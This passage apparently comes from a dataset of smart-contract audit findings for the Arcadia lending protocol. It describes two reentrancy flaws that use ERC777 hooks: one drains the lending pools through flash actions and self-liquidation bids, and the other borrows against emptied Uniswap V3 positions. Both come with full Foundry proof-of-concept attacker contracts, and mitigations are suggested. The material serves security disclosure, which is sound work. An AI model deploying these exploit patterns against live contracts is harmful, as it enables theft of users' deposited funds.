than the total liabilities against the Account (including the debt taken during this function).\\n // flashActionByCreditor also checks that the Account indeed has opened a margin account for this Lending Pool.\\n {\\n uint256 accountVersion = IAccount(account).flashActionByCreditor(actionTarget, actionData);\\n if (!isValidVersion[accountVersion]) revert LendingPoolErrors.InvalidVersion();\\n }\\n \\n // rest of code \\n }\\n```\\n\\n```\\n// AccountV1.sol\\n\\nfunction flashActionByCreditor(address actionTarget, bytes calldata actionData)\\n external\\n nonReentrant\\n notDuringAuction\\n updateActionTimestamp\\n returns (uint256 accountVersion)\\n {\\n \\n // rest of code\\n\\n // Account must be healthy after actions are executed.\\n if (isAccountUnhealthy()) revert AccountErrors.AccountUnhealthy();\\n\\n // rest of code\\n }\\n```\\n\\nProof of Concept\\nThe following proof of concept illustrates how the previously described attack can take place. Follow the steps in order to reproduce it:\\nCreate a `ERC777Mock.sol` file in `lib/accounts-v2/test/utils/mocks/tokens` and paste the code found in this github gist.\\nImport the ERC777Mock and change the MockOracles, MockERC20 and Rates structs in `lib/accounts-v2/test/utils/Types.sol` to add an additional `token777ToUsd`, `token777` of type ERC777Mock and `token777ToUsd` rate:\\n`import ""../utils/mocks/tokens/ERC777Mock.sol""; // <----- Import this\\n\\n...\\n\\nstruct MockOracles {\\n ArcadiaOracle stable1ToUsd;\\n ArcadiaOracle stable2ToUsd;\\n ArcadiaOracle token1ToUsd;\\n ArcadiaOracle token2ToUsd;\\n ArcadiaOracle token3ToToken4;\\n ArcadiaOracle token4ToUsd;\\n ArcadiaOracle token777ToUsd; // <----- Add this\\n ArcadiaOracle nft1ToToken1;\\n ArcadiaOracle nft2ToUsd;\\n ArcadiaOracle nft3ToToken1;\\n ArcadiaOracle sft1ToToken1;\\n ArcadiaOracle sft2ToUsd;\\n}\\n\\nstruct MockERC20 {\\n ERC20Mock stable1;\\n ERC20Mock stable2;\\n ERC20Mock token1;\\n ERC20Mock token2;\\n ERC20Mock token3;\\n ERC20Mock 
token4;\\n ERC777Mock token777; // <----- Add this\\n}\\n\\n...\\n\\nstruct Rates {\\n uint256 stable1ToUsd;\\n uint256 stable2ToUsd;\\n uint256 token1ToUsd;\\n uint256 token2ToUsd;\\n uint256 token3ToToken4;\\n uint256 token4ToUsd;\\n uint256 token777ToUsd; // <----- Add this\\n uint256 nft1ToToken1;\\n uint256 nft2ToUsd;\\n uint256 nft3ToToken1;\\n uint256 sft1ToToken1;\\n uint256 sft2ToUsd;\\n}`\\nReplace the contents inside `lib/accounts-v2/test/fuzz/Fuzz.t.sol` for the code found in this github gist.\\nTo finish the setup, replace the file found in `lending-v2/test/fuzz/Fuzz.t.sol` for the code found in this github gist.\\nFor the actual proof of concept, create a `Poc.t.sol` file in `test/fuzz/LendingPool` and paste the following code. The code contains the proof of concept test, as well as the action target implementation:\\n/**\\n * Created by Pragma Labs\\n * SPDX-License-Identifier: BUSL-1.1\\n */\\npragma solidity 0.8.22;\\n\\nimport { LendingPool_Fuzz_Test } from ""./_LendingPool.fuzz.t.sol"";\\n\\nimport { ActionData, IActionBase } from ""../../../lib/accounts-v2/src/interfaces/IActionBase.sol"";\\nimport { IPermit2 } from ""../../../lib/accounts-v2/src/interfaces/IPermit2.sol"";\\n\\n/// @notice Proof of Concept - Arcadia\\ncontract Poc is LendingPool_Fuzz_Test {\\n\\n /////////////////////////////////////////////////////////////////\\n // TEST CONTRACTS //\\n /////////////////////////////////////////////////////////////////\\n\\n ActionHandler internal actionHandler;\\n bytes internal callData;\\n\\n /////////////////////////////////////////////////////////////////\\n // SETUP //\\n /////////////////////////////////////////////////////////////////\\n\\n function setUp() public override {\\n // Setup pool test\\n LendingPool_Fuzz_Test.setUp();\\n\\n // Deploy action handler\\n vm.prank(users.creatorAddress);\\n actionHandler = new ActionHandler(address(liquidator), address(proxyAccount));\\n\\n // Set origination fee\\n 
vm.prank(users.creatorAddress);\\n pool.setOriginationFee(100); // 1%\\n\\n // Transfer some tokens to actiontarget to perform liquidation repayment and approve tokens to be transferred to pool \\n vm.startPrank(users.liquidityProvider);\\n mockERC20.token777.transfer(address(actionHandler), 1 ether);\\n mockERC20.token777.approve(address(pool), type(uint256).max);\\n\\n // Deposit 100 erc777 tokens into pool\\n vm.startPrank(address(srTranche));\\n pool.depositInLendingPool(100 ether, users.liquidityProvider);\\n assertEq(mockERC20.token777.balanceOf(address(pool)), 100 ether);\\n\\n // Approve creditor from actiontarget for bid payment\\n vm.startPrank(address(actionHandler));\\n mockERC20.token777.approve(address(pool), type(uint256).max);\\n\\n }\\n\\n /////////////////////////////////////////////////////////////////\\n // POC //\\n /////////////////////////////////////////////////////////////////\\n /// @notice Test exploiting the reentrancy vulnerability. \\n /// Prerequisites:\\n /// - Create an actionTarget contract that will trigger the attack flow using the ERC777 callback when receiving the \\n /// borrowed funds in the flash action.\\n /// - Have some liquidity deposited in the pool in order to be able to borrow it\\n /// Attack:\\n /// 1. Open a margin account in the creditor to be exploited.\\n /// 2. Deposit a small amount of collateral. This amount needs to be big enough to cover the `minUsdValue` configured\\n /// in the registry for the given creditor.\\n /// 3. Create the `actionData` for the account's `flashAction()` function. The data contained in it (withdrawData, transferFromOwnerData,\\n /// permit, signature and actionTargetData) can be empty, given that such data is not required for the attack.\\n /// 4. Trigger LendingPool.flashAction(). The execution flow will:\\n /// a. Mint the flash-actioned debt to the account\\n /// b. Send the borrowed funds to the action target\\n /// c. 
The action target will execute the ERC777 `tokensReceived()` callback, which will:\\n /// - Trigger Liquidator.liquidateAccount(), which will set the account in an auction state\\n /// - Trigger Liquidator.bid(). \\n \\n function testVuln_reentrancyInFlashActionEnablesStealingAllProtocolFunds(\\n uint128 amountLoaned,\\n uint112 collateralValue,\\n uint128 liquidity,\\n uint8 originationFee\\n ) public { \\n\\n //---------- STEP 1 ----------//\\n // Open a margin account\\n vm.startPrank(users.accountOwner);\\n proxyAccount.openMarginAccount(address(pool)); \\n \\n //---------- STEP 2 ----------//\\n // Deposit 1 stable token in the account as collateral.\\n // Note: The creditors's `minUsdValue` is set to 1 * 10 ** 18. Because\\n // value is converted to an 18-decimal number and the asset is pegged to 1 dollar,\\n // depositing an amount of 1 * 10 ** 6 is the actual minimum usd amount so that the \\n // account's collateral value is not considered as 0.\\n depositTokenInAccount(proxyAccount, mockERC20.stable1, 1 * 10 ** 6);\\n assertEq(proxyAccount.getCollateralValue(), 1 * 10 ** 18);\\n\\n //---------- STEP 3 ----------//\\n // Create empty action data. The action handler won't withdraw/deposit any asset from the account \\n // when the `flashAction()` callback in the account is triggered. Hence, action data will contain empty elements.\\n callData = _buildActionData();\\n\\n // Fetch balances from the action handler (who will receive all the borrowed funds from the flash action)\\n // as well as the pool. 
\\n // Action handler balance initially has 1 token of `token777` (given initially on deployment)\\n assertEq(mockERC20.token777.balanceOf(address(actionHandler)), 1 * 10 ** 18);\\n uint256 liquidityPoolBalanceBefore = mockERC20.token777.balanceOf(address(pool));\\n uint256 actionHandlerBalanceBefore = mockERC20.token777.balanceOf(address(actionHandler));\\n // Pool initially has 100 tokens of `token777` (deposited by the liquidity provider in setUp())\\n assertEq(mockERC20.token777.balanceOf(address(pool)), 100 * 10 ** 18);\\n\\n //---------- STEP 4 ----------//\\n // Step 4. Trigger the flash action.\\n vm.startPrank(users.accountOwner);\\n\\n pool.flashAction(100 ether , address(proxyAccount), address(actionHandler), callData, emptyBytes3);\\n vm.stopPrank();\\n \\n \\n //---------- FINAL ASSERTIONS ----------//\\n\\n // Action handler (who is the receiver of the borrowed funds in the flash action) has succesfully obtained 100 tokens from \\n //the pool, and in the end it has nearly 101 tokens (initially it had 1 token, plus the 100 tokens stolen \\n // from the pool minus the small amount required to pay for the bid)\\n assertGt(mockERC20.token777.balanceOf(address(actionHandler)), 100 * 10 ** 18);\\n\\n // On the other hand, pool has lost nearly all of its balance, only remaining the small amount paid from the \\n // action handler in order to bid\\n assertLt(mockERC20.token777.balanceOf(address(pool)), 0.05 * 10 ** 18);\\n \\n } \\n\\n /// @notice Internal function to build the `actionData` payload needed to execute the `flashActionByCreditor()` \\n /// callback when requesting a flash action\\n function _buildActionData() internal returns(bytes memory) {\\n ActionData memory emptyActionData;\\n address[] memory to;\\n bytes[] memory data;\\n bytes memory actionTargetData = abi.encode(emptyActionData, to, data);\\n IPermit2.PermitBatchTransferFrom memory permit;\\n bytes memory signature;\\n return abi.encode(emptyActionData, emptyActionData, permit, 
signature, actionTargetData);\\n }\\n}\\n\\n/// @notice ERC777Recipient interface\\ninterface IERC777Recipient {\\n \\n function tokensReceived(\\n address operator,\\n address from,\\n address to,\\n uint256 amount,\\n bytes calldata userData,\\n bytes calldata operatorData\\n ) external;\\n}\\n\\n /// @notice Liquidator interface\\ninterface ILiquidator {\\n function liquidateAccount(address account) external;\\n function bid(address account, uint256[] memory askedAssetAmounts, bool endAuction_) external;\\n}\\n\\n /// @notice actionHandler contract that will trigger the attack via ERC777's `tokensReceived()` callback\\ncontract ActionHandler is IERC777Recipient, IActionBase {\\n\\n ILiquidator public immutable liquidator;\\n address public immutable account;\\n uint256 triggered;\\n\\n constructor(address _liquidator, address _account) {\\n liquidator = ILiquidator(_liquidator);\\n account = _account;\\n } \\n\\n /// @notice ERC777 callback function\\n function tokensReceived(\\n address operator,\\n address from,\\n address to,\\n uint256 amount,\\n bytes calldata userData,\\n bytes calldata operatorData\\n ) external {\\n // Only trigger the callback once (avoid triggering it while receiving funds in the setup + when receiving final funds)\\n if(triggered == 1) {\\n triggered = 2;\\n liquidator.liquidateAccount(account);\\n uint256[] memory askedAssetAmounts = new uint256[](1);\\n askedAssetAmounts[0] = 1; // only ask for 1 wei of token so that we repay a small share of the debt\\n liquidator.bid(account, askedAssetAmounts, true);\\n }\\n unchecked{\\n triggered++;\\n }\\n }\\n\\n function executeAction(bytes calldata actionTargetData) external returns (ActionData memory) {\\n ActionData memory data;\\n return data;\\n }\\n\\n}\\nExecute the proof of concept with the following command (being inside the `lending-v2` folder): `forge test --mt testVuln_reentrancyInFlashActionEnablesStealingAllProtocolFunds`","This attack is possible because the 
`getCollateralValue()` function returns a 0 collateral value due to the `minUsdValue` mentioned before not being reached after executing the bid. The Liquidator's `_settleAuction()` function then believes the collateral held in the account is 0.\\nIn order to mitigate the issue, consider fetching the actual real collateral value inside `_settleAuction()` even if it is less than the `minUsdValue` held in the account, so that the function can properly check if the full collateral was sold or not.\\n```\\n// Liquidator.sol\\nfunction _settleAuction(address account, AuctionInformation storage auctionInformation_)\\n internal\\n returns (bool success)\\n {\\n // rest of code\\n\\n uint256 collateralValue = IAccount(account).getCollateralValue(); // <----- Fetch the REAL collateral value instead of reducing it to 0 if `minUsdValue` is not reached\\n \\n \\n // rest of code\\n }\\n```\\n",The impact for this vulnerability is high. All funds deposited in creditors with ERC777 tokens as the underlying asset can be drained.,"```\\n// Liquidator.sol\\n\\nfunction bid(address account, uint256[] memory askedAssetAmounts, bool endAuction_) external nonReentrant {\\n AuctionInformation storage auctionInformation_ = auctionInformation[account];\\n if (!auctionInformation_.inAuction) revert LiquidatorErrors.NotForSale();\\n\\n // Calculate the current auction price of the assets being bought.\\n uint256 totalShare = _calculateTotalShare(auctionInformation_, askedAssetAmounts);\\n uint256 price = _calculateBidPrice(auctionInformation_, totalShare);\\n \\n // Transfer an amount of ""price"" in ""Numeraire"" to the LendingPool to repay the Accounts debt.\\n // The LendingPool will call a ""transferFrom"" from the bidder to the pool -> the bidder must approve the LendingPool.\\n // If the amount transferred would exceed the debt, the surplus is paid out to the Account Owner and earlyTerminate is True.\\n uint128 startDebt = auctionInformation_.startDebt;\\n bool earlyTerminate = 
ILendingPool(auctionInformation_.creditor).auctionRepay(\\n startDebt, auctionInformation_.minimumMargin, price, account, msg.sender\\n );\\n // rest of code\\n}\\n```\\n" +Caching Uniswap position liquidity allows borrowing using undercollateralized Uni positions,high,"It is possible to fake the amount of liquidity held in a Uniswap V3 position, making the protocol believe the Uniswap position has more liquidity than the actual liquidity deposited in the position. This makes it possible to borrow using undercollateralized Uniswap positions.\\nWhen depositing into an account, the `deposit()` function is called, which calls the internal `_deposit()` function. Depositing is performed in two steps:\\nThe registry's `batchProcessDeposit()` function is called. This function checks if the deposited assets can be priced, and in case that a creditor is set, it also updates the exposures and underlying assets for the creditor.\\nThe assets are transferred and deposited into the account.\\n```\\n// AccountV1.sol\\n\\nfunction _deposit(\\n address[] memory assetAddresses,\\n uint256[] memory assetIds,\\n uint256[] memory assetAmounts,\\n address from\\n ) internal {\\n // If no Creditor is set, batchProcessDeposit only checks if the assets can be priced.\\n // If a Creditor is set, batchProcessDeposit will also update the exposures of assets and underlying assets for the Creditor.\\n uint256[] memory assetTypes =\\n IRegistry(registry).batchProcessDeposit(creditor, assetAddresses, assetIds, assetAmounts);\\n\\n for (uint256 i; i < assetAddresses.length; ++i) {\\n // Skip if amount is 0 to prevent storing addresses that have 0 balance.\\n if (assetAmounts[i] == 0) continue;\\n\\n if (assetTypes[i] == 0) {\\n if (assetIds[i] != 0) revert AccountErrors.InvalidERC20Id();\\n _depositERC20(from, assetAddresses[i], assetAmounts[i]);\\n } else if (assetTypes[i] == 1) {\\n if (assetAmounts[i] != 1) revert AccountErrors.InvalidERC721Amount();\\n _depositERC721(from, assetAddresses[i], 
assetIds[i]);\\n } else if (assetTypes[i] == 2) {\\n _depositERC1155(from, assetAddresses[i], assetIds[i], assetAmounts[i]);\\n } else {\\n revert AccountErrors.UnknownAssetType();\\n }\\n }\\n\\n if (erc20Stored.length + erc721Stored.length + erc1155Stored.length > ASSET_LIMIT) {\\n revert AccountErrors.TooManyAssets();\\n }\\n }\\n```\\n\\nFor Uniswap positions (and assuming that a creditor is set), calling `batchProcessDeposit()` will internally trigger the UniswapV3AM.processDirectDeposit():\\n```\\n// UniswapV3AM.sol\\n\\nfunction processDirectDeposit(address creditor, address asset, uint256 assetId, uint256 amount)\\n public\\n override\\n returns (uint256 recursiveCalls, uint256 assetType)\\n {\\n // Amount deposited of a Uniswap V3 LP can be either 0 or 1 (checked in the Account).\\n // For uniswap V3 every id is a unique asset -> on every deposit the asset must added to the Asset Module.\\n if (amount == 1) _addAsset(assetId);\\n\\n // rest of code\\n }\\n```\\n\\nThe Uniswap position will then be added to the protocol using the internal `_addAsset()` function. One of the most important actions performed inside this function is to store the liquidity that the Uniswap position has in that moment. 
Such liquidity is obtained from directly querying the NonfungiblePositionManager contract:\\n```\\nfunction _addAsset(uint256 assetId) internal {\\n // rest of code\\n\\n (,, address token0, address token1,,,, uint128 liquidity,,,,) = NON_FUNGIBLE_POSITION_MANAGER.positions(assetId);\\n\\n // No need to explicitly check if token0 and token1 are allowed, _addAsset() is only called in the\\n // deposit functions and there any deposit of non-allowed Underlying Assets will revert.\\n if (liquidity == 0) revert ZeroLiquidity();\\n\\n // The liquidity of the Liquidity Position is stored in the Asset Module,\\n // not fetched from the NonfungiblePositionManager.\\n // Since liquidity of a position can be increased by a non-owner,\\n // the max exposure checks could otherwise be circumvented.\\n assetToLiquidity[assetId] = liquidity;\\n\\n // rest of code\\n }\\n```\\n\\nAs the snippet shows, the liquidity is stored in a mapping because “Since liquidity of a position can be increased by a non-owner, the max exposure checks could otherwise be circumvented.”. From this point forward, and until the Uniswap position is withdrawn from the account, the collateral value (i.e the amount that the position is worth) will be computed utilizing the `_getPosition()` internal function, which will read the cached liquidity value stored in the `assetToLiquidity[assetId]` mapping, rather than directly consulting the NonFungibleManager contract. 
This way, the position won't be able to surpass the max exposures:\\n```\\n// UniswapV3AM.sol\\n\\nfunction _getPosition(uint256 assetId)\\n internal\\n view\\n returns (address token0, address token1, int24 tickLower, int24 tickUpper, uint128 liquidity)\\n {\\n // For deposited assets, the liquidity of the Liquidity Position is stored in the Asset Module,\\n // not fetched from the NonfungiblePositionManager.\\n // Since liquidity of a position can be increased by a non-owner, the max exposure checks could otherwise be circumvented.\\n liquidity = uint128(assetToLiquidity[assetId]);\\n\\n if (liquidity > 0) {\\n (,, token0, token1,, tickLower, tickUpper,,,,,) = NON_FUNGIBLE_POSITION_MANAGER.positions(assetId);\\n } else {\\n // Only used as an off-chain view function by getValue() to return the value of a non deposited Liquidity Position.\\n (,, token0, token1,, tickLower, tickUpper, liquidity,,,,) = NON_FUNGIBLE_POSITION_MANAGER.positions(assetId);\\n }\\n }\\n```\\n\\nHowever, storing the liquidity leads to an attack vector that allows Uniswap positions' liquidity to be comlpetely withdrawn while making the protocol believe that the Uniswap position is still full.\\nAs mentioned in the beginning of the report, the deposit process is done in two steps: processing assets in the registry and transferring the actual assets to the account. Because processing assets in the registry is the step where the Uniswap position's liquidity is cached, a malicious depositor can use an ERC777 hook in the transferring process to withdraw the liquidity in the Uniswap position.\\nThe following steps show how the attack could be performed:\\nInitially, a malicious contract must be created. 
This contract will be the one holding the assets and depositing them into the account, and will also be able to trigger the ERC777's `tokensToSend()` hook.\\nThe malicious contract will call the account's `deposit()` function with two `assetAddresses` to be deposited: the first asset must be an ERC777 token, and the second asset must be the Uniswap position.\\n`IRegistry(registry).batchProcessDeposit()` will then execute. This is the first of the two steps taking place to deposit assets, where the liquidity from the Uniswap position will be fetched from the NonFungiblePositionManager and stored in the `assetToLiquidity[assetId]` mapping.\\nAfter processing the assets, the transferring phase will start. The first asset to be transferred will be the ERC777 token. This will trigger the `tokensToSend()` hook in our malicious contract. At this point, our contract is still the owner of the Uniswap position (the Uniswap position won't be transferred until the ERC777 transfer finishes), so the liquidity in the Uniswap position can be decreased inside the hook triggered in the malicious contract. This leaves the Uniswap position with a smaller liquidity amount than the one stored in the `batchProcessDeposit()` step, making the protocol believe that the liquidity stored in the position is the one that the position had prior to starting the attack.\\nFinally, and following the transfer of the ERC777 token, the Uniswap position will be transferred and succesfully deposited in the account. 
Arcadia will believe that the account has a Uniswap position worth some liquidity, when in reality the Uni position will be empty.\\nProof of Concept\\nThis proof of concept show show the previous attack can be performed so that the liquidity in the uniswap position is 0, while the collateral value for the account is far greater than 0.\\nCreate a `ERC777Mock.sol` file in `lib/accounts-v2/test/utils/mocks/tokens` and paste the code found in this github gist.\\nImport the ERC777Mock and change the MockOracles, MockERC20 and Rates structs in `lib/accounts-v2/test/utils/Types.sol` to add an additional `token777ToUsd`, `token777` of type ERC777Mock and `token777ToUsd` rate:\\n`import ""../utils/mocks/tokens/ERC777Mock.sol""; // <----- Import this\\n\\n...\\n\\nstruct MockOracles {\\n ArcadiaOracle stable1ToUsd;\\n ArcadiaOracle stable2ToUsd;\\n ArcadiaOracle token1ToUsd;\\n ArcadiaOracle token2ToUsd;\\n ArcadiaOracle token3ToToken4;\\n ArcadiaOracle token4ToUsd;\\n ArcadiaOracle token777ToUsd; // <----- Add this\\n ArcadiaOracle nft1ToToken1;\\n ArcadiaOracle nft2ToUsd;\\n ArcadiaOracle nft3ToToken1;\\n ArcadiaOracle sft1ToToken1;\\n ArcadiaOracle sft2ToUsd;\\n}\\n\\nstruct MockERC20 {\\n ERC20Mock stable1;\\n ERC20Mock stable2;\\n ERC20Mock token1;\\n ERC20Mock token2;\\n ERC20Mock token3;\\n ERC20Mock token4;\\n ERC777Mock token777; // <----- Add this\\n}\\n\\n...\\n\\nstruct Rates {\\n uint256 stable1ToUsd;\\n uint256 stable2ToUsd;\\n uint256 token1ToUsd;\\n uint256 token2ToUsd;\\n uint256 token3ToToken4;\\n uint256 token4ToUsd;\\n uint256 token777ToUsd; // <----- Add this\\n uint256 nft1ToToken1;\\n uint256 nft2ToUsd;\\n uint256 nft3ToToken1;\\n uint256 sft1ToToken1;\\n uint256 sft2ToUsd;\\n}`\\nReplace the contents inside `lib/accounts-v2/test/fuzz/Fuzz.t.sol` for the code found in this github gist.\\nNext step is to replace the file found in `lending-v2/test/fuzz/Fuzz.t.sol` for the code found in this github gist.\\nCreate a `PocUniswap.t.sol` file in 
`lending-v2/test/fuzz/LendingPool/PocUniswap.t.sol` and paste the following code snippet into it:\\n`/**\\n * Created by Pragma Labs\\n * SPDX-License-Identifier: BUSL-1.1\\n */\\npragma solidity 0.8.22;\\n\\nimport { LendingPool_Fuzz_Test } from ""./_LendingPool.fuzz.t.sol"";\\n\\nimport { IPermit2 } from ""../../../lib/accounts-v2/src/interfaces/IPermit2.sol"";\\nimport { UniswapV3AM_Fuzz_Test, UniswapV3Fixture, UniswapV3AM, IUniswapV3PoolExtension, TickMath } from ""../../../lib/accounts-v2/test/fuzz/asset-modules/UniswapV3AM/_UniswapV3AM.fuzz.t.sol"";\\nimport { ERC20Mock } from ""../../../lib/accounts-v2/test/utils/mocks/tokens/ERC20Mock.sol"";\\n\\nimport ""forge-std/console.sol"";\\n\\ninterface IERC721 {\\n function ownerOf(uint256 tokenid) external returns(address);\\n function approve(address spender, uint256 tokenId) external;\\n}\\n \\n/// @notice Proof of Concept - Arcadia\\ncontract Poc is LendingPool_Fuzz_Test, UniswapV3AM_Fuzz_Test { \\n\\n /////////////////////////////////////////////////////////////////\\n // CONSTANTS //\\n /////////////////////////////////////////////////////////////////\\n int24 private MIN_TICK = -887_272;\\n int24 private MAX_TICK = -MIN_TICK;\\n\\n /////////////////////////////////////////////////////////////////\\n // STORAGE //\\n /////////////////////////////////////////////////////////////////\\n AccountOwner public accountOwnerContract;\\n ERC20Mock token0;\\n ERC20Mock token1;\\n uint256 tokenId;\\n\\n /////////////////////////////////////////////////////////////////\\n // SETUP //\\n /////////////////////////////////////////////////////////////////\\n\\n function setUp() public override(LendingPool_Fuzz_Test, UniswapV3AM_Fuzz_Test) {\\n // Setup pool test\\n LendingPool_Fuzz_Test.setUp();\\n\\n // Deploy fixture for Uniswap.\\n UniswapV3Fixture.setUp();\\n\\n deployUniswapV3AM(address(nonfungiblePositionManager));\\n\\n vm.startPrank(users.riskManager);\\n registryExtension.setRiskParametersOfDerivedAM(\\n 
address(pool), address(uniV3AssetModule), type(uint112).max, 100\\n );\\n \\n token0 = mockERC20.token1;\\n token1 = mockERC20.token2;\\n (token0, token1) = token0 < token1 ? (token0, token1) : (token1, token0);\\n\\n // Deploy account owner\\n accountOwnerContract = new AccountOwner(address(nonfungiblePositionManager));\\n\\n \\n // Set origination fee\\n vm.startPrank(users.creatorAddress);\\n pool.setOriginationFee(100); // 1%\\n\\n // Transfer ownership to Account Owner \\n vm.startPrank(users.accountOwner);\\n factory.safeTransferFrom(users.accountOwner, address(accountOwnerContract), address(proxyAccount));\\n vm.stopPrank();\\n \\n\\n // Mint uniswap position underlying tokens to accountOwnerContract\\n mockERC20.token1.mint(address(accountOwnerContract), 100 ether);\\n mockERC20.token2.mint(address(accountOwnerContract), 100 ether);\\n\\n // Open Uniswap position \\n tokenId = _openUniswapPosition();\\n \\n\\n // Transfer some ERC777 tokens to accountOwnerContract. These will be used to be deposited as collateral into the account\\n vm.startPrank(users.liquidityProvider);\\n mockERC20.token777.transfer(address(accountOwnerContract), 1 ether);\\n }\\n\\n /////////////////////////////////////////////////////////////////\\n // POC //\\n /////////////////////////////////////////////////////////////////\\n /// @notice Test exploiting the reentrancy vulnerability. \\n function testVuln_borrowUsingUndercollateralizedUniswapPosition(\\n uint128 amountLoaned,\\n uint112 collateralValue,\\n uint128 liquidity,\\n uint8 originationFee\\n ) public { \\n\\n //---------- STEP 1 ----------//\\n // Open margin account setting pool as new creditor\\n vm.startPrank(address(accountOwnerContract));\\n proxyAccount.openMarginAccount(address(pool)); \\n \\n //---------- STEP 2 ----------//\\n // Deposit assets into account. The order of the assets to be deposited is important. 
The first asset will be an ERC777 token that triggers the callback on transferring.\\n // The second asset will be the uniswap position.\\n\\n address[] memory assetAddresses = new address[](2);\\n assetAddresses[0] = address(mockERC20.token777);\\n assetAddresses[1] = address(nonfungiblePositionManager);\\n uint256[] memory assetIds = new uint256[](2);\\n assetIds[0] = 0;\\n assetIds[1] = tokenId;\\n uint256[] memory assetAmounts = new uint256[](2);\\n assetAmounts[0] = 1; // no need to send more than 1 wei as the ERC777 only serves to trigger the callback\\n assetAmounts[1] = 1;\\n // Set approvals\\n IERC721(address(nonfungiblePositionManager)).approve(address(proxyAccount), tokenId);\\n mockERC20.token777.approve(address(proxyAccount), type(uint256).max);\\n\\n // Perform deposit. \\n // Deposit will perform two steps:\\n // 1. processDeposit(): this step will handle the deposited assets and verify everything is correct. For uniswap positions, the liquidity in the position\\n // will be stored in the `assetToLiquidity` mapping.\\n // 2.Transferring the assets: after processing the assets, the actual asset transfers will take place. First, the ER777 colallateral will be transferred. \\n // This will trigger the callback in the accountOwnerContract (the account owner), which will withdraw all the uniswap position liquidity. Because the uniswap \\n // position liquidity has been cached in step 1 (processDeposit()), the protocol will still believe that the uniswap position has some liquidity, when in reality\\n // all the liquidity from the position has been withdrawn in the ERC777 `tokensToSend()` callback. \\n proxyAccount.deposit(assetAddresses, assetIds, assetAmounts);\\n\\n //---------- FINAL ASSERTIONS ----------//\\n // Collateral value fetches the `assetToLiquidity` value cached prior to removing position liquidity. 
This does not reflect that the position is empty,\\n // hence it is possible to borrow with an empty uniswap position.\\n uint256 finalCollateralValue = proxyAccount.getCollateralValue();\\n\\n // Liquidity in the position is 0.\\n (\\n ,\\n ,\\n ,\\n ,\\n ,\\n ,\\n ,\\n uint128 liquidity,\\n ,\\n ,\\n ,\\n ) = nonfungiblePositionManager.positions(tokenId); \\n\\n console.log(""Collateral value of account:"", finalCollateralValue);\\n console.log(""Actual liquidity in position"", liquidity);\\n\\n assertEq(liquidity, 0);\\n assertGt(finalCollateralValue, 1000 ether); // Collateral value is greater than 1000\\n } \\n\\n function _openUniswapPosition() internal returns(uint256 tokenId) {\\n vm.startPrank(address(accountOwnerContract));\\n \\n uint160 sqrtPriceX96 = uint160(\\n calculateAndValidateRangeTickCurrent(\\n 10 * 10**18, // priceToken0\\n 20 * 10**18 // priceToken1\\n )\\n );\\n\\n // Create Uniswap V3 pool initiated at tickCurrent with cardinality 300.\\n IUniswapV3PoolExtension uniswapPool = createPool(token0, token1, TickMath.getSqrtRatioAtTick(TickMath.getTickAtSqrtRatio(sqrtPriceX96)), 300);\\n\\n // Approve liquidity\\n mockERC20.token1.approve(address(uniswapPool), type(uint256).max);\\n mockERC20.token2.approve(address(uniswapPool), type(uint256).max);\\n\\n // Mint liquidity position.\\n uint128 liquidity = 100 * 10**18;\\n tokenId = addLiquidity(uniswapPool, liquidity, address(accountOwnerContract), MIN_TICK, MAX_TICK, false);\\n \\n assertEq(IERC721(address(nonfungiblePositionManager)).ownerOf(tokenId), address(accountOwnerContract));\\n }\\n \\n}\\n\\n/// @notice ERC777Sender interface\\ninterface IERC777Sender {\\n /**\\n * @dev Called by an {IERC777} token contract whenever a registered holder's\\n * (`from`) tokens are about to be moved or destroyed. 
The type of operation\\n * is conveyed by `to` being the zero address or not.\\n *\\n * This call occurs _before_ the token contract's state is updated, so\\n * {IERC777-balanceOf}, etc., can be used to query the pre-operation state.\\n *\\n * This function may revert to prevent the operation from being executed.\\n */\\n function tokensToSend(\\n address operator,\\n address from,\\n address to,\\n uint256 amount,\\n bytes calldata userData,\\n bytes calldata operatorData\\n ) external;\\n}\\n\\ninterface INonfungiblePositionManager {\\n function positions(uint256 tokenId)\\n external\\n view\\n returns (\\n uint96 nonce,\\n address operator,\\n address token0,\\n address token1,\\n uint24 fee,\\n int24 tickLower,\\n int24 tickUpper,\\n uint128 liquidity,\\n uint256 feeGrowthInside0LastX128,\\n uint256 feeGrowthInside1LastX128,\\n uint128 tokensOwed0,\\n uint128 tokensOwed1\\n );\\n\\n struct DecreaseLiquidityParams {\\n uint256 tokenId;\\n uint128 liquidity;\\n uint256 amount0Min;\\n uint256 amount1Min;\\n uint256 deadline;\\n }\\n function decreaseLiquidity(DecreaseLiquidityParams calldata params)\\n external\\n payable\\n returns (uint256 amount0, uint256 amount1);\\n}\\n\\n /// @notice AccountOwner contract that will trigger the attack via ERC777's `tokensToSend()` callback\\ncontract AccountOwner is IERC777Sender {\\n\\n INonfungiblePositionManager public nonfungiblePositionManager;\\n\\n constructor(address _nonfungiblePositionManager) {\\n nonfungiblePositionManager = INonfungiblePositionManager(_nonfungiblePositionManager);\\n }\\n\\n function tokensToSend(\\n address operator,\\n address from,\\n address to,\\n uint256 amount,\\n bytes calldata userData,\\n bytes calldata operatorData\\n ) external {\\n // Remove liquidity from Uniswap position\\n (\\n ,\\n ,\\n ,\\n ,\\n ,\\n ,\\n ,\\n uint128 liquidity,\\n ,\\n ,\\n ,\\n ) = nonfungiblePositionManager.positions(1); // tokenId 1\\n\\n INonfungiblePositionManager.DecreaseLiquidityParams memory params = 
INonfungiblePositionManager.DecreaseLiquidityParams({\\n tokenId: 1,\\n liquidity: liquidity,\\n amount0Min: 0,\\n amount1Min: 0,\\n deadline: block.timestamp\\n });\\n nonfungiblePositionManager.decreaseLiquidity(params);\\n }\\n \\n\\n function onERC721Received(address, address, uint256, bytes calldata) public pure returns (bytes4) {\\n return bytes4(abi.encodeWithSignature(""onERC721Received(address,address,uint256,bytes)""));\\n }\\n\\n}`\\nExecute the following command being inside the `lending-v2` folder: `forge test --mt testVuln_borrowUsingUndercollateralizedUniswapPosition -vvvvv`.\\nNOTE: It is possible that you find issues related to code not being found. This is because the Uniswap V3 deployment uses foundry's `vm.getCode()` and we are importing the deployment file from the `accounts-v2` repo to the `lending-v2` repo, which makes foundry throw some errors. To fix this, just compile the contracts in the `accounts-v2` repo and copy the missing folders from the `accounts-v2/out` generated folder into the `lending-v2/out` folder.","There are several ways to mitigate this issue. One possible option is to perform the transfer of assets when depositing at the same time that the asset is processed, instead of first processing the assets (and storing the Uniswap liquidity) and then transferring them. Another option is to perform a liquidity check after depositing the Uniswap position, ensuring that the liquidity stored in the assetToLiquidity[assetId] mapping and the one returned by the NonFungiblePositionManager are the same.","High. The protocol will always believe that there is liquidity deposited in the Uniswap position while in reality the position is empty. 
